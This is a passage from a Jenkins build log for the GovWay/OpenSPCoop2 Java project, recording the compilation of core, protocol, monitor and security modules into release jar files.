/var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:02 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:02 [WARNING] [echo] **************************************** 17:55:02 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:02 [WARNING] [echo] **************************************** 17:55:02 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:02 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/integrazione] 17:55:02 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:55:02 [INFO] [javac] Compiling 19 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:02 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-integrazione_RELEASE.jar 17:55:02 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:05 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:05 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:05 [WARNING] [echo] **************************************** 17:55:05 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:05 [WARNING] [echo] **************************************** 17:55:05 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:05 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/config/driver] 17:55:05 [INFO] [javac] Compiling 18 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:06 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-config-driver_RELEASE.jar 17:55:06 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:09 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:09 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:09 [WARNING] [echo] **************************************** 17:55:09 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:09 [WARNING] [echo] **************************************** 17:55:09 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:09 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/config/driver/db] 17:55:09 [INFO] [javac] Compiling 38 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:12 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-config-driver-db_RELEASE.jar 17:55:12 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:15 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:15 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:15 [WARNING] [echo] **************************************** 17:55:15 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:15 [WARNING] [echo] **************************************** 17:55:15 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:15 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/config/driver/xml] 17:55:15 [INFO] [javac] Compiling 1 source file to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:16 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-config-driver-xml_RELEASE.jar 17:55:16 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:18 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:18 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:18 [WARNING] [echo] **************************************** 17:55:18 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:18 [WARNING] [echo] **************************************** 17:55:18 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:18 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/config/driver/utils] 17:55:18 [INFO] [javac] Compiling 3 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:19 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-config-driver-utils_RELEASE.jar 17:55:19 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:22 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:22 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:22 [WARNING] [echo] **************************************** 17:55:22 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:22 [WARNING] [echo] **************************************** 17:55:22 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:22 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/registry/driver] 17:55:22 [INFO] [javac] Compiling 75 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:24 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-registry-driver_RELEASE.jar 17:55:24 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:27 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:27 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:27 [WARNING] [echo] **************************************** 17:55:27 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:27 [WARNING] [echo] **************************************** 17:55:27 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:27 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/registry/wsdl] 17:55:27 [INFO] [javac] Compiling 15 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:28 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-registry-wsdl_RELEASE.jar 17:55:28 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:32 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:32 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:32 [WARNING] [echo] **************************************** 17:55:32 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:32 [WARNING] [echo] **************************************** 17:55:32 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:32 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/registry/rest] 17:55:32 [INFO] [javac] Compiling 3 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:32 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-registry-rest_RELEASE.jar 17:55:32 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:36 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:36 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:36 [WARNING] [echo] **************************************** 17:55:36 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:36 [WARNING] [echo] **************************************** 17:55:36 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:36 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/registry/driver/db] 17:55:36 [INFO] [javac] Compiling 36 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:38 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-registry-driver-db_RELEASE.jar 17:55:38 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:42 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:42 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:42 [WARNING] [echo] **************************************** 17:55:42 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:42 [WARNING] [echo] **************************************** 17:55:42 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:42 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/registry/driver/xml] 17:55:42 [INFO] [javac] Compiling 1 source file to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:43 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-registry-driver-xml_RELEASE.jar 17:55:43 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:46 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:46 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:46 [WARNING] [echo] **************************************** 17:55:46 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:46 [WARNING] [echo] **************************************** 17:55:46 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:46 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/registry/driver/utils] 17:55:46 [INFO] [javac] Compiling 4 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:47 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-registry-driver-utils_RELEASE.jar 17:55:47 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:49 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:49 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:49 [WARNING] [echo] **************************************** 17:55:49 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:49 [WARNING] [echo] **************************************** 17:55:49 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:49 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/commons/search] 17:55:49 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:55:49 [INFO] [javac] Compiling 184 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:53 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:55:53 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-commons-search_RELEASE.jar 17:55:53 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:56 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:56 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:55:56 [WARNING] [echo] **************************************** 17:55:56 [WARNING] [echo] **** DEBUG MODE ON ***** 17:55:56 [WARNING] [echo] **************************************** 17:55:56 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:55:56 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/commons/dao] 17:55:56 [INFO] [javac] Compiling 4 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:57 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-commons-dao_RELEASE.jar 17:55:57 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:00 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:00 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:00 [WARNING] [echo] **************************************** 17:56:00 [WARNING] [echo] **** DEBUG MODE ON ***** 17:56:00 [WARNING] [echo] **************************************** 17:56:00 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:00 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/mvc/properties] 17:56:00 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:56:00 [INFO] [javac] Compiling 59 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:01 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:56:01 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-mvc_properties_RELEASE.jar 17:56:01 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:04 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:04 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:04 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:56:04 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_core_RELEASE.jar 17:56:14 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:14 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:14 [WARNING] [echo] **************************************** 17:56:14 [WARNING] [echo] **** DEBUG MODE ON ***** 17:56:14 [WARNING] [echo] **************************************** 17:56:14 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/protocol-api 17:56:14 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:14 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/protocol/manifest] 17:56:14 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:56:14 [INFO] [javac] Compiling 131 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:17 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:56:18 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/protocol-api/openspcoop2_protocol-manifest_RELEASE.jar 17:56:18 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:22 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:22 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:22 [WARNING] [echo] **************************************** 17:56:22 [WARNING] [echo] **** DEBUG MODE ON ***** 17:56:22 [WARNING] [echo] **************************************** 17:56:22 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:22 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/protocol/information_missing] 17:56:22 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:56:22 [INFO] [javac] Compiling 83 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:24 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:56:24 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/protocol-api/openspcoop2_protocol-information_missing_RELEASE.jar 17:56:24 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:30 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:30 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:30 [WARNING] [echo] **************************************** 17:56:30 [WARNING] [echo] **** DEBUG MODE ON ***** 17:56:30 [WARNING] [echo] **************************************** 17:56:30 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:30 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/protocol/sdk] 17:56:30 [INFO] [javac] Compiling 226 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:32 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/protocol-api/openspcoop2_protocol-sdk_RELEASE.jar 17:56:32 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:37 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:37 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:37 [WARNING] [echo] **************************************** 17:56:37 [WARNING] [echo] **** DEBUG MODE ON ***** 17:56:37 [WARNING] [echo] **************************************** 17:56:37 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:37 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/protocol/utils] 17:56:37 [INFO] [javac] Compiling 19 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:39 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/protocol-api/openspcoop2_protocol-utils_RELEASE.jar 17:56:39 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:46 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:46 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:46 [WARNING] [echo] **************************************** 17:56:46 [WARNING] [echo] **** DEBUG MODE ON ***** 17:56:46 [WARNING] [echo] **************************************** 17:56:46 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:46 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/protocol/registry] 17:56:46 [INFO] [javac] Compiling 9 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:49 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/protocol-api/openspcoop2_protocol-registry_RELEASE.jar 17:56:49 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:54 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:54 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:54 [WARNING] [echo] **************************************** 17:56:54 [WARNING] [echo] **** DEBUG MODE ON ***** 17:56:54 [WARNING] [echo] **************************************** 17:56:54 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:54 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/protocol/abstraction] 17:56:54 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:56:54 [INFO] [javac] Compiling 64 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:56 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:56:56 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/protocol-api/openspcoop2_protocol-abstraction_RELEASE.jar 17:56:56 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:59 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:56:59 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:56:59 [WARNING] [echo] **************************************** 17:56:59 [WARNING] [echo] **** DEBUG MODE ON ***** 17:56:59 [WARNING] [echo] **************************************** 17:56:59 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:56:59 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/protocol/basic] 17:56:59 [INFO] [javac] Compiling 63 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:01 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/protocol-api/openspcoop2_protocol-basic_RELEASE.jar 17:57:01 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:04 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:04 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:04 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:57:04 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_protocol-api_RELEASE.jar 17:57:11 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:11 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:11 [WARNING] [echo] **************************************** 17:57:11 [WARNING] [echo] **** DEBUG MODE ON ***** 17:57:11 [WARNING] [echo] **************************************** 17:57:11 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/monitor-api 17:57:11 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:11 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/monitor/sdk] 17:57:11 [INFO] [javac] Compiling 69 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:13 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/monitor-api/openspcoop2_monitor-sdk_RELEASE.jar 17:57:13 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:16 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:16 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:16 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:57:16 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_monitor-api_RELEASE.jar 17:57:25 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:25 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:25 [WARNING] [echo] **************************************** 17:57:25 [WARNING] [echo] **** DEBUG MODE ON ***** 17:57:25 [WARNING] [echo] **************************************** 17:57:25 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/security 17:57:25 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:25 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/security] 17:57:25 [INFO] [javac] Compiling 50 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:27 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/security/openspcoop2_security-core_RELEASE.jar 17:57:27 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:30 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:30 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:30 [WARNING] [echo] **************************************** 17:57:30 [WARNING] [echo] **** DEBUG MODE ON ***** 17:57:30 [WARNING] [echo] **************************************** 17:57:30 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:30 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/security/message] 17:57:30 [INFO] [javac] Compiling 52 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:31 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/security/openspcoop2_security-message_RELEASE.jar 17:57:31 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:37 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:37 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:37 [WARNING] [echo] **************************************** 17:57:37 [WARNING] [echo] **** DEBUG MODE ON ***** 17:57:37 [WARNING] [echo] **************************************** 17:57:37 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:37 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/security/message/engine] 17:57:37 [INFO] [javac] Compiling 9 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:39 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/security/openspcoop2_security-message-engine_RELEASE.jar 17:57:39 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:46 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:46 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:46 [WARNING] [echo] **************************************** 17:57:46 [WARNING] [echo] **** DEBUG MODE ON ***** 17:57:46 [WARNING] [echo] **************************************** 17:57:46 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:46 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/security/message/jose] 17:57:46 [INFO] [javac] Compiling 14 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:47 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/security/openspcoop2_security-message-jose_RELEASE.jar 17:57:47 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:52 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:52 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:52 [WARNING] [echo] **************************************** 17:57:52 [WARNING] [echo] **** DEBUG MODE ON ***** 17:57:52 [WARNING] [echo] **************************************** 17:57:52 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:52 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/security/message/xml] 17:57:52 [INFO] [javac] Compiling 12 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:53 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/security/openspcoop2_security-message-xml_RELEASE.jar 17:57:53 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:56 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:56 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:57:56 [WARNING] [echo] **************************************** 17:57:56 [WARNING] [echo] **** DEBUG MODE ON ***** 17:57:56 [WARNING] [echo] **************************************** 17:57:56 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:57:56 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/security/message/wss4j] 17:57:56 [INFO] [javac] Compiling 14 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:57:57 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/security/openspcoop2_security-message-wss4j_RELEASE.jar 17:57:57 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:00 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:00 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:00 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:58:00 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_security_RELEASE.jar 17:58:07 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:07 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:07 [WARNING] [echo] **************************************** 17:58:07 [WARNING] [echo] **** DEBUG MODE ON ***** 17:58:07 [WARNING] [echo] **************************************** 17:58:07 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/protocol 17:58:07 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:07 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/protocol/engine] 17:58:07 [INFO] [javac] Compiling 83 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:10 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/protocol/openspcoop2_protocol_RELEASE.jar 17:58:10 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:13 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:13 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:13 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:58:13 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_protocol_RELEASE.jar 17:58:19 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:19 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:19 [WARNING] [echo] **************************************** 17:58:19 [WARNING] [echo] **** DEBUG 